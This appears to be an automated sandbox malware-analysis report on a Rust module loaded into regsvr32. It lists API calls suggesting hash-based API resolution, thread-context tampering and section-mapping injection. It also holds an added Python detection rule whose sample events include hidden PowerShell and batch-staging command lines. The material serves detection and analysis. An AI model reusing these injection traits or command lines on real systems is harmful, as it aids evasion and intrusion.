• Module at 0x6C850000 loaded in regsvr32 (see the snapshot file and the Rust std strings below): GetProcessHeap, HeapAlloc, HeapFree, memcpy, memmove, GetSystemInfo, GetEnvironmentVariableW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetLastError, GetLastError, CompareStringOrdinal, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, GetModuleFileNameW, SetCurrentDirectoryW, GetFileAttributesW, CloseHandle, WaitOnAddress, WakeByAddressSingle, CreateProcessW (block 6c8f747a; the success path closes three handles, the failure path calls GetLastError, and both release the attribute list with DeleteProcThreadAttributeList).
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 6C8F3CE6
• FreeEnvironmentStringsW.KERNEL32(?), ref: 6C8F3E7A
• CloseHandle.KERNEL32(?), ref: 6C8F47EA
• GetLastError.KERNEL32 ref: 6C8F7943
• CloseHandle.KERNEL32(?), ref: 6C8F7FE6
Strings
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: CloseEnvironmentHandleStrings$ErrorFreeLast
• String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$?$H$PATHstd\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
• Note (editorial): the strings `program path has no file name`, `cmd.exe /e:ON /v:OFF /d /c "`, `\\.\NUL`, `exit code:` and the source path `std\src\sys_common\process.rs` are Rust standard-library std::process::Command strings (the cmd.exe prefix is what that library prepends when spawning a .bat/.cmd file). The module mapped at 6C850000 inside regsvr32 is therefore Rust-compiled code whose CreateProcessW path is reached through that library; whether the run actually took that path is not recoverable from the graph text.
• API String ID: 1593577933-2749016963
• Opcode ID: 8e86767ae253443d7893b9a13645cf69a95d264f98fbde20e88dd6f3e3d94515
• Instruction ID: 50c733ea15049571c02fe84a99038268aed8001b687a251f8283995e9f8f1167
• Opcode Fuzzy Hash: 8e86767ae253443d7893b9a13645cf69a95d264f98fbde20e88dd6f3e3d94515
• Instruction Fuzzy Hash: E27391719093819FE330CF18CA80B9AB7E1BFC5348F158E2DE8A897751D7759906CB92
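The spawn capability documented above (a module loaded into regsvr32.exe that reaches CreateProcessW through Rust's std::process::Command, whose batch-file prefix `cmd.exe /e:ON /v:OFF /d /c "` appears verbatim in the String ID list) is the kind of thing a detection engineer turns into a parent/child rule. The following is an added example, not code from the report or from Joe Security: it classifies process-creation events in a Sysmon Event ID 1 shape. The event records, the rule names and the benign-child allowlist are constructed for the example and are assumptions, not data from this analysis.

```python
r"""Flag suspicious children of regsvr32.exe, with a dedicated rule for the
Rust standard-library batch-file spawn prefix seen in the module's strings.
Added example (not report or Joe Security code). Event records are constructed
in a Sysmon Event ID 1 shape; they are not events from the sandbox run."""
from __future__ import annotations
import ntpath

# Exact prefix Rust's std::process::Command prepends when the target is a
# .bat/.cmd file; it appears verbatim in the String ID list above (lower-cased here).
RUST_BATCH_PREFIX = '/e:on /v:off /d /c "'

# Assumption for this example: the only child regsvr32.exe normally produces is
# Windows Error Reporting after a crash. Tune this to the environment.
BENIGN_REGSVR32_CHILDREN = {"werfault.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def split_cmdline(cmdline: str) -> tuple[str, str]:
    """Return (program token, remaining arguments), honouring a quoted program path."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    head, _, rest = s.partition(" ")
    return head, rest.strip()


def classify(event: dict) -> str | None:
    """Rule name for a suspicious regsvr32.exe child, or None for anything else."""
    if basename(event.get("ParentImage", "")) != "regsvr32.exe":
        return None
    child = basename(event.get("Image", ""))
    if child in BENIGN_REGSVR32_CHILDREN:
        return None
    prog, args = split_cmdline(event.get("CommandLine", ""))
    if basename(prog) == "cmd.exe" and args.lower().startswith(RUST_BATCH_PREFIX):
        return "regsvr32_rust_std_batch_spawn"   # strongest signal: exact library prefix
    if child in SHELLS:
        return "regsvr32_spawns_shell"
    return "regsvr32_unexpected_child"


def suspicious_regsvr32_children(events: list[dict]) -> list[tuple[int, str]]:
    """(ProcessId, rule) for every matching event, in input order."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((ev["ProcessId"], rule))
    return hits


# Constructed sample records (not from the analysis). Only the first, fourth and
# fifth should fire: WerFault is allowlisted and cargo.exe is not regsvr32.
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /e:ON /v:OFF /d /c "C:\Users\Public\stage.bat"',
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
    {"ProcessId": 4420, "Image": r"C:\Windows\System32\WerFault.exe",
     "CommandLine": r"C:\Windows\System32\WerFault.exe -u -p 4400 -s 1234",
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
    {"ProcessId": 4431, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /e:ON /v:OFF /d /c "build.bat"',
     "ParentImage": r"C:\Users\dev\.cargo\bin\cargo.exe"},
    {"ProcessId": 4440, "Image": r"C:\Users\Public\update.exe",
     "CommandLine": r'"C:\Users\Public\update.exe" -q',
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
    {"ProcessId": 4452, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c Start-Sleep 1",
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
]

if __name__ == "__main__":
    for pid, rule in suspicious_regsvr32_children(SAMPLE_EVENTS):
        print(pid, rule)
```

The prefix rule is deliberately scoped to regsvr32.exe as parent: legitimate Rust tooling (cargo, build scripts) spawns .bat files with the same prefix, so matching the prefix alone would be noisy. The broader "any unexpected child" rule catches the case where the module launches something other than a shell.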

Control-flow Graph (function at 6C8543E0; the rendered graph is not reproduced, and its executed/not-executed colouring is not recoverable from the text; each basic block is listed with its calls and successor blocks)
• 1166 6c8543e0-6c85443d: call 6c852730, call 6c851a10, call 6c920e90 -> 1173, 1174
• 1173 6c854443-6c85445d: CreateMutexA, GetLastError -> 1175, 1176
• 1174 6c854589-6c8545b4: call 6c92c280 -> 1183
• 1175 6c85445f-6c854464 -> 1178, 1179
• 1176 6c85447a-6c8544ab: call 6c858960, call 6c855c30, call 6c85ac30 -> 1196, 1197
• 1178 6c854466-6c85446f: call 6c85ac40 -> 1179
• 1179 6c854472-6c854479 (no successors)
• 1183 6c8545c5-6c8545f8: call 6c85ac40 -> 1192, 1193
• 1192 6c85460a -> 1198, 1199
• 1193 6c8545fa-6c854607: call 6c85ac40 -> 1192
• 1196 6c8545b6-6c8545c2: call 6c920620 -> 1183
• 1197 6c8544b1-6c8544c8: memcpy -> 1203
• 1198 6c854610-6c85461c: call 6c852730 (no successors)
• 1199 6c85460b: call 6c9459b0 -> 1198
• 1203 6c8544d0-6c8544e5 -> 1203 (loop), 1205
• 1205 6c8544e7-6c85450d: HeapCreate, HeapAlloc, GetLastError -> 1206, 1207
• 1206 6c854563-6c85457e: call 6c85ac40 -> 1178, 1213
• 1207 6c85450f-6c854523: call 6c855c30, call 6c856300 -> 1214
• 1213 6c854584 -> 1179
• 1214 6c854528-6c854532 -> 1215, 1216
• 1215 6c854544-6c85455e: memmove, HeapFree -> 1206
• 1216 6c854534 -> 1215, 1217
• 1217 6c854536-6c854541: call 6c85ac40 -> 1215
                                                                  APIs
                                                                    • Part of subcall function 6C920E90: memcpy.MSVCRT(00000000,?,6C854435,?,?,6C854435,?,?,00000005), ref: 6C920ED2
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6C85444E
                                                                  • GetLastError.KERNEL32(00000000,00000000,?), ref: 6C854453
                                                                  • memcpy.MSVCRT(00000000,6C9553D4,00022BD5,?,?,?), ref: 6C8544BE
                                                                  • HeapCreate.KERNEL32(00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C8544F0
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00022BD5,00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C8544FF
                                                                  • GetLastError.KERNEL32(00000000,00000008,00022BD5,00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C854506
                                                                  • memmove.MSVCRT(?,00000000,00022BD5,?,00000000,?,?,?,?,?,?), ref: 6C85454E
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C85455E
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  • memcmp.MSVCRT(?,?,0000000A), ref: 6C8546FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CreateErrorFreeLastmemcpy$AllocMutexmemcmpmemmove
                                                                  • String ID: $ nAj$$8g%$-$1 -$@H1$Vw;c$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$not yet implemented$~<.5
                                                                  • API String ID: 1533937674-4106935003
                                                                  • Opcode ID: 4923ffcd203aa133b9df6b714b994145a58fc1468659bdbd036d7ddc6cd3ec46
                                                                  • Instruction ID: f4cc76f7250980d664516667054c83bc34d8b79636a1f3c2040e172f9ab1c386
                                                                  • Opcode Fuzzy Hash: 4923ffcd203aa133b9df6b714b994145a58fc1468659bdbd036d7ddc6cd3ec46
                                                                  • Instruction Fuzzy Hash: D4D28DB1D002299FDB64CFA4CD81BEEBBB4AF49304F5044A9E909BB741E7719A94CF50

                                                                   Control-flow Graph: rendered graph of the function starting at 6c874c20 (blocks coloured executed / not executed); the graph's node and edge dump is not reproduced here.

                                                                  APIs
                                                                  • GetProcessTimes.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 6C874CC7
                                                                    • Part of subcall function 6C89A6B0: GetLastError.KERNEL32(?,6C86131E,6C8577BC,?,6C8577BC,?,?,?,?,6C851F14,?), ref: 6C89A6B3
                                                                  • GetSystemTimes.KERNEL32(00000000,00000000,00000000), ref: 6C874D17
                                                                  • GetProcessIoCounters.KERNEL32(?,?), ref: 6C874FDB
                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 6C8750B3
                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 6C8750F1
                                                                  • GetProcessHeap.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875105
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C87511A
                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,00000000,00000000,00000008,00000000,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875135
                                                                  • CloseHandle.KERNEL32(?,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875259
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C87534A
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C87537D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Information$Token$HeapQueryTimes$AllocCloseCountersErrorHandleLastOpenSystem
                                                                  • String ID: P=p
                                                                  • API String ID: 2108018208-1494869396
                                                                  • Opcode ID: de807f53dda19503c649355e850e6297b5384502d09da07da3bcffd812359227
                                                                  • Instruction ID: 272af59c72f92779ab5d163ec5c0a02514cc110173b8374210a8e3bce5818fe5
                                                                  • Opcode Fuzzy Hash: de807f53dda19503c649355e850e6297b5384502d09da07da3bcffd812359227
                                                                  • Instruction Fuzzy Hash: 4762A1719093409FD731CF28C984BAEB7E5BFC5304F148A2DE89997651EB31E944CB62

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateTimerQueue.KERNEL32 ref: 6C855C39
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C855C50
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6C855C5F
                                                                  • LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 6C855CD9
                                                                  • GetProcAddress.KERNEL32(00000000,24199433), ref: 6C855D44
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 6C855D8E
                                                                  • GetProcAddress.KERNEL32(00000000,DA12A734), ref: 6C855DEA
                                                                  • LoadLibraryA.KERNEL32(?,00000000,DA12A734,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C855E39
                                                                  • GetProcAddress.KERNEL32(00000000,ABA9F710), ref: 6C855EA4
                                                                  • LoadLibraryA.KERNEL32(?,00000000,ABA9F710,?,?,00000000,DA12A734,?,?,?,?,?,?,?,?,00000000), ref: 6C855EFE
                                                                  • GetProcAddress.KERNEL32(00000000,1B571B31), ref: 6C855F68
                                                                  • LoadLibraryA.KERNEL32(?,00000000,1B571B31,?,?,00000000,ABA9F710,?,?,00000000,DA12A734,?,?), ref: 6C855FC2
                                                                  • GetProcAddress.KERNEL32(?,D39EAE30), ref: 6C85602C
                                                                  • LoadLibraryA.KERNEL32(D39EAE30,?,D39EAE30,?,?,00000000,1B571B31,?,?,00000000,ABA9F710,?,?,00000000,DA12A734), ref: 6C856083
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C8560CF
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000,1B571B31,?,?), ref: 6C856115
                                                                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000,1B571B31), ref: 6C856124
                                                                  • SetEvent.KERNEL32(00000000,00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000), ref: 6C85614C
                                                                  • DeleteTimerQueue.KERNEL32(?), ref: 6C856154
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$CreateEvent$HandleModuleQueueTimer$DeleteObjectSingleWait
                                                                  • String ID: {?m
                                                                  • API String ID: 3325657596-405188894
                                                                  • Opcode ID: 3ff4ad5bc09a559fcbc8975c611c26c94fd6ca1015e3abfc24ed74c44d5d8f10
                                                                  • Instruction ID: ce9912aeb018822277bb800d6e0152be34f6d0436e3cc0e6293f0c59614e5907
                                                                  • Opcode Fuzzy Hash: 3ff4ad5bc09a559fcbc8975c611c26c94fd6ca1015e3abfc24ed74c44d5d8f10
                                                                  • Instruction Fuzzy Hash: 270227B1D002689FCF41CFA5D8809EEBBB4BF1D304F55826AE405BB351E7389615CB60

                                                                   Control-flow Graph: rendered graph of the function starting at 6c856300 (blocks coloured executed / not executed); the graph's node and edge dump is not reproduced here.

                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C85631D
                                                                  • GetModuleHandleA.KERNEL32(?), ref: 6C85639D
                                                                  • LoadLibraryA.KERNEL32(?,?), ref: 6C8563AA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C856432
                                                                  • GetModuleHandleA.KERNEL32(?), ref: 6C8564F4
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C856571
                                                                    • Part of subcall function 6C920E90: memcpy.MSVCRT(00000000,?,6C854435,?,?,6C854435,?,?,00000005), ref: 6C920ED2
                                                                  • AddVectoredExceptionHandler.KERNEL32(00000001,6C856230), ref: 6C8565C0
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C8565E2
                                                                  • NtQuerySystemInformation.NTDLL ref: 6C85662D
                                                                  • NtOpenThread.NTDLL(00000000,001FFFFF,?,00000000), ref: 6C856707
                                                                  • NtGetContextThread.NTDLL(?,0001003F), ref: 6C856772
                                                                  • NtSetContextThread.NTDLL ref: 6C8567E3
                                                                  • NtClose.NTDLL ref: 6C8567F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AddressContextHandleInformationModuleProcQuery$CloseExceptionHandlerLibraryLoadOpenProcessSystemVectoredmemcpymemset
                                                                  • String ID: ?$called `Result::unwrap()` on an `Err` value$ymR:
                                                                  • API String ID: 731487932-1315676627
                                                                  • Opcode ID: b8e3a2d7afdadd9f56301cd5ec78c371c40f263423c8148e080df9279874600a
                                                                  • Instruction ID: 70167fcaf5a1639c6bac7042fc52a7b6955d1b41fe4906bf691d510a8d9dd35d
                                                                  • Opcode Fuzzy Hash: b8e3a2d7afdadd9f56301cd5ec78c371c40f263423c8148e080df9279874600a
                                                                  • Instruction Fuzzy Hash: 8A22B0B4E012189FEF61CFA4C980BEEB7F4AF19304F548519E814BB781E7B59A54CB60

                                                                   Control-flow Graph: rendered graph of the function starting at 6c8f26d0 (blocks coloured executed / not executed); the graph's node and edge dump is not reproduced here.

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(6C855B4B,?,6C8E66C3,?,?,6C855B4B,00000000), ref: 6C8F26D4
                                                                  • GetCurrentProcessId.KERNEL32 ref: 6C8F2730
                                                                  • ProcessPrng.BCRYPTPRIMITIVES(?,00000010), ref: 6C8F2758
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitPrng
                                                                  • String ID:
                                                                  • API String ID: 1405477490-0
                                                                  • Opcode ID: 05f8fdad851dff8cd6379f69d47779c643c2be709fb504816d67c3247da4e00f
                                                                  • Instruction ID: a89f14cc12c98bfb920d20605386e157687af30add2842404eed78a63da25113
                                                                  • Opcode Fuzzy Hash: 05f8fdad851dff8cd6379f69d47779c643c2be709fb504816d67c3247da4e00f
                                                                  • Instruction Fuzzy Hash: 8222F2719083919FD324CF28C58475ABBE1BF89348F148E2DF8A897781D779D846CB92

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00005510), ref: 02636535
                                                                  • GetConsoleWindow.KERNEL32(00000000), ref: 0263653D
                                                                  • ShowWindow.USER32(00000000), ref: 02636544
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02636550
                                                                  • PostThreadMessageA.USER32(00000000), ref: 02636557
                                                                  • GetInputState.USER32 ref: 0263655D
                                                                    • Part of subcall function 02635E40: _memset.LIBCMT ref: 02635E71
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005120,00000000,00000000,00000000), ref: 02636577
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02636585
                                                                  • CloseHandle.KERNEL32(0264DA78), ref: 02636591
                                                                  • Sleep.KERNEL32(0000012C), ref: 0263659C
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Window$CloseConsoleCreateCurrentExceptionFilterHandleInputMessageObjectPostShowSingleSleepStateUnhandledWait_memset
                                                                  • String ID:
                                                                  • API String ID: 1910205397-0
                                                                  • Opcode ID: 2de2f345751527c1cda5996534d36e3540a4fe83b4f5ed794f6101a8caac6b59
                                                                  • Instruction ID: 0e5f18c1cea4467eebb4bda50e7d1450b8b9f09299a3d6b470974b466e3d1c3f
                                                                  • Opcode Fuzzy Hash: 2de2f345751527c1cda5996534d36e3540a4fe83b4f5ed794f6101a8caac6b59
                                                                  • Instruction Fuzzy Hash: A0F05F7DEC5240BBE7116BB0DC0EF0D36A5AB29B12F901D10B357DA1C4CAA464A08B65
                                                                  APIs
                                                                  • NtCreateSection.NTDLL(CC32C43A,000F001F,00000000,CC32C442,00000040,08000000,00000000,00000000), ref: 04FA1935
                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 04FA19DD
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04FA1D51
                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 04FA1E06
                                                                  • VirtualProtect.KERNEL32(?,?,00000008,CC32C42A), ref: 04FA1E23
                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 04FA1EC6
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,CC32C42A), ref: 04FA1EF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                  • String ID:
                                                                  • API String ID: 2664363762-0
                                                                  • Opcode ID: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction ID: dff64424bcdeff338c92a6b6cc32ea56d382fe4cdb9a890eaba4a77aea14b026
                                                                  • Opcode Fuzzy Hash: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                                  • Instruction Fuzzy Hash: 3A429BB1A08301AFD724CF24C944B6BB7E9FF88714F06496DF9859B241E730E966CB91

                                                                  Control-flow Graph

                                                                   • Control-flow graph for the function at 6c85bc60 (graph not rendered; its basic blocks call GetSystemInfo and memcpy, the remaining edges are internal calls).
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C85BC92
                                                                  • memcpy.MSVCRT(00000001,?,?), ref: 6C85C3B2
                                                                    • Part of subcall function 6C9232A0: memcpy.MSVCRT(00000001,?,?,?,?,?,?,6C85BBED,?,?,?,8B3B74C0,00000000,00000000), ref: 6C9232DF
                                                                    • Part of subcall function 6C9232A0: memcpy.MSVCRT(00000030,?,?), ref: 6C923337
                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,?), ref: 6C85BFDB
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  • unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\cpu.rs, xrefs: 6C85BFB1
                                                                  • 0, xrefs: 6C85BDA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
